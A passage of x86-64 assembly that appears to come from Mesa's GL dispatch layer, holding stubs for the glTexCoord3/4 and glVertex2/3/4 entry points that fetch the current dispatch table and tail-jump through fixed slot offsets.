	movq 904(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 904(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3fv), .-GL_PREFIX(TexCoord3fv)

/* TexCoord3i: three integer args (%rdi-%rdx); 3 pushes keep %rsp aligned; offset 912 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3i)
	.type GL_PREFIX(TexCoord3i), @function
GL_PREFIX(TexCoord3i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 912(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 912(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 912(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 912(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3i), .-GL_PREFIX(TexCoord3i)

/* TexCoord3iv: one pointer arg in %rdi; offset 920 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3iv)
	.type GL_PREFIX(TexCoord3iv), @function
GL_PREFIX(TexCoord3iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 920(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 920(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 920(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 920(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3iv), .-GL_PREFIX(TexCoord3iv)

/* TexCoord3s: three integer args (%rdi-%rdx); offset 928 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3s)
	.type GL_PREFIX(TexCoord3s), @function
GL_PREFIX(TexCoord3s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 928(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 928(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 928(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 928(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3s), .-GL_PREFIX(TexCoord3s)

/* TexCoord3sv: one pointer arg in %rdi; offset 936 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord3sv)
	.type GL_PREFIX(TexCoord3sv), @function
GL_PREFIX(TexCoord3sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 936(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 936(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 936(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 936(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord3sv), .-GL_PREFIX(TexCoord3sv)
/*
 * Dispatch stubs for the TexCoord4* entry points.  Each stub resolves
 * the current dispatch table (thread-local call, pthread lookup, or the
 * global _glapi_Dispatch with a lazy-init fallback), loads the slot at
 * a fixed byte offset, and tail-jumps.  Live SysV argument registers
 * are preserved across the nested lookup call; push counts and spill
 * frame sizes keep %rsp 16-byte aligned at that call.
 */
/* TexCoord4d: four FP args in %xmm0-%xmm3, spilled to a 40-byte frame; offset 944 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4d)
	.type GL_PREFIX(TexCoord4d), @function
GL_PREFIX(TexCoord4d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 944(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $40, %rsp		/* 32 bytes of spill + 8 alignment padding */
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 944(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f			/* table not yet initialized */
	movq 944(%rax), %r11
	jmp *%r11
1:
	subq $40, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _glapi_get_dispatch
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 944(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4d), .-GL_PREFIX(TexCoord4d)

/* TexCoord4dv: one pointer arg in %rdi; offset 952 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4dv)
	.type GL_PREFIX(TexCoord4dv), @function
GL_PREFIX(TexCoord4dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 952(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 952(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 952(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 952(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4dv), .-GL_PREFIX(TexCoord4dv)

/* TexCoord4f: four FP args in %xmm0-%xmm3; offset 960 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4f)
	.type GL_PREFIX(TexCoord4f), @function
GL_PREFIX(TexCoord4f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 960(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $40, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 960(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 960(%rax), %r11
	jmp *%r11
1:
	subq $40, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _glapi_get_dispatch
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 960(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4f), .-GL_PREFIX(TexCoord4f)

/* TexCoord4fv: one pointer arg in %rdi; offset 968 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4fv)
	.type GL_PREFIX(TexCoord4fv), @function
GL_PREFIX(TexCoord4fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 968(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 968(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 968(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 968(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4fv), .-GL_PREFIX(TexCoord4fv)

/* TexCoord4i: four integer args (%rdi-%rcx); %rbp push is alignment padding; offset 976 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4i)
	.type GL_PREFIX(TexCoord4i), @function
GL_PREFIX(TexCoord4i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 976(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 976(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 976(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 976(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4i), .-GL_PREFIX(TexCoord4i)

/* TexCoord4iv: one pointer arg in %rdi; offset 984 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4iv)
	.type GL_PREFIX(TexCoord4iv), @function
GL_PREFIX(TexCoord4iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 984(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 984(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 984(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 984(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4iv), .-GL_PREFIX(TexCoord4iv)

/* TexCoord4s: four integer args (%rdi-%rcx); offset 992 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4s)
	.type GL_PREFIX(TexCoord4s), @function
GL_PREFIX(TexCoord4s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 992(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 992(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 992(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 992(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4s), .-GL_PREFIX(TexCoord4s)

/* TexCoord4sv: one pointer arg in %rdi; offset 1000 */
	.p2align 4,,15
	.globl GL_PREFIX(TexCoord4sv)
	.type GL_PREFIX(TexCoord4sv), @function
GL_PREFIX(TexCoord4sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1000(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1000(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1000(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1000(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexCoord4sv), .-GL_PREFIX(TexCoord4sv)
/*
 * Dispatch stubs for the Vertex2* entry points.  Each stub resolves
 * the current dispatch table (thread-local call, pthread lookup, or the
 * global _glapi_Dispatch with a lazy-init fallback), loads the slot at
 * a fixed byte offset, and tail-jumps.  Live SysV argument registers
 * are preserved across the nested lookup call; push counts and spill
 * frame sizes keep %rsp 16-byte aligned at that call.
 */
/* Vertex2d: two FP args in %xmm0-%xmm1, spilled to a 24-byte frame; offset 1008 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2d)
	.type GL_PREFIX(Vertex2d), @function
GL_PREFIX(Vertex2d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1008(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp		/* 16 bytes of spill + 8 alignment padding */
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 1008(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f			/* table not yet initialized */
	movq 1008(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 1008(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2d), .-GL_PREFIX(Vertex2d)

/* Vertex2dv: one pointer arg in %rdi; offset 1016 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2dv)
	.type GL_PREFIX(Vertex2dv), @function
GL_PREFIX(Vertex2dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1016(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1016(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1016(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1016(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2dv), .-GL_PREFIX(Vertex2dv)

/* Vertex2f: two FP args in %xmm0-%xmm1; offset 1024 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2f)
	.type GL_PREFIX(Vertex2f), @function
GL_PREFIX(Vertex2f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1024(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 1024(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1024(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $24, %rsp
	movq 1024(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2f), .-GL_PREFIX(Vertex2f)

/* Vertex2fv: one pointer arg in %rdi; offset 1032 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2fv)
	.type GL_PREFIX(Vertex2fv), @function
GL_PREFIX(Vertex2fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1032(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1032(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1032(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1032(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2fv), .-GL_PREFIX(Vertex2fv)

/* Vertex2i: two integer args (%rdi, %rsi); %rbp push is alignment padding; offset 1040 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2i)
	.type GL_PREFIX(Vertex2i), @function
GL_PREFIX(Vertex2i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1040(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1040(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1040(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1040(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2i), .-GL_PREFIX(Vertex2i)

/* Vertex2iv: one pointer arg in %rdi; offset 1048 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2iv)
	.type GL_PREFIX(Vertex2iv), @function
GL_PREFIX(Vertex2iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1048(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1048(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1048(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1048(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2iv), .-GL_PREFIX(Vertex2iv)

/* Vertex2s: two integer args (%rdi, %rsi); offset 1056 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2s)
	.type GL_PREFIX(Vertex2s), @function
GL_PREFIX(Vertex2s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1056(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1056(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1056(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1056(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2s), .-GL_PREFIX(Vertex2s)

/* Vertex2sv: one pointer arg in %rdi; offset 1064 */
	.p2align 4,,15
	.globl GL_PREFIX(Vertex2sv)
	.type GL_PREFIX(Vertex2sv), @function
GL_PREFIX(Vertex2sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1064(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1064(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1064(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1064(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex2sv), .-GL_PREFIX(Vertex2sv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3d)
.type GL_PREFIX(Vertex3d), @function
GL_PREFIX(Vertex3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1072(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3d), .-GL_PREFIX(Vertex3d)
.p2align 4,,15
.globl GL_PREFIX(Vertex3dv)
.type GL_PREFIX(Vertex3dv), @function
GL_PREFIX(Vertex3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1080(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3dv), .-GL_PREFIX(Vertex3dv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3f)
.type GL_PREFIX(Vertex3f), @function
GL_PREFIX(Vertex3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1088(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3f), .-GL_PREFIX(Vertex3f)
.p2align 4,,15
.globl GL_PREFIX(Vertex3fv)
.type GL_PREFIX(Vertex3fv), @function
GL_PREFIX(Vertex3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1096(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3fv), .-GL_PREFIX(Vertex3fv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3i)
.type GL_PREFIX(Vertex3i), @function
GL_PREFIX(Vertex3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3i), .-GL_PREFIX(Vertex3i)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex3iv)
	.type GL_PREFIX(Vertex3iv), @function
/* glVertex3iv: jump through dispatch-table slot 139 (byte offset 1112). */
GL_PREFIX(Vertex3iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1112(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1112(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1112(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1112(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex3iv), .-GL_PREFIX(Vertex3iv)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex3s)
	.type GL_PREFIX(Vertex3s), @function
/* glVertex3s: jump through dispatch-table slot 140 (byte offset 1120). */
GL_PREFIX(Vertex3s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1120(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three integer argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1120(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1120(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1120(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex3s), .-GL_PREFIX(Vertex3s)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex3sv)
	.type GL_PREFIX(Vertex3sv), @function
/* glVertex3sv: jump through dispatch-table slot 141 (byte offset 1128). */
GL_PREFIX(Vertex3sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1128(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1128(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1128(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1128(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex3sv), .-GL_PREFIX(Vertex3sv)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4d)
	.type GL_PREFIX(Vertex4d), @function
/* glVertex4d: jump through dispatch-table slot 142 (byte offset 1136).
 * Four double args arrive in %xmm0-%xmm3, which are caller-saved, so they
 * are spilled to the stack around the dispatch-lookup call. */
GL_PREFIX(Vertex4d):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1136(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $40, %rsp	/* 32 bytes of spill + 8 pad keeps %rsp 16-aligned */
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 1136(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1136(%rax), %r11
	jmp *%r11
1:
	subq $40, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _glapi_get_dispatch
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 1136(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
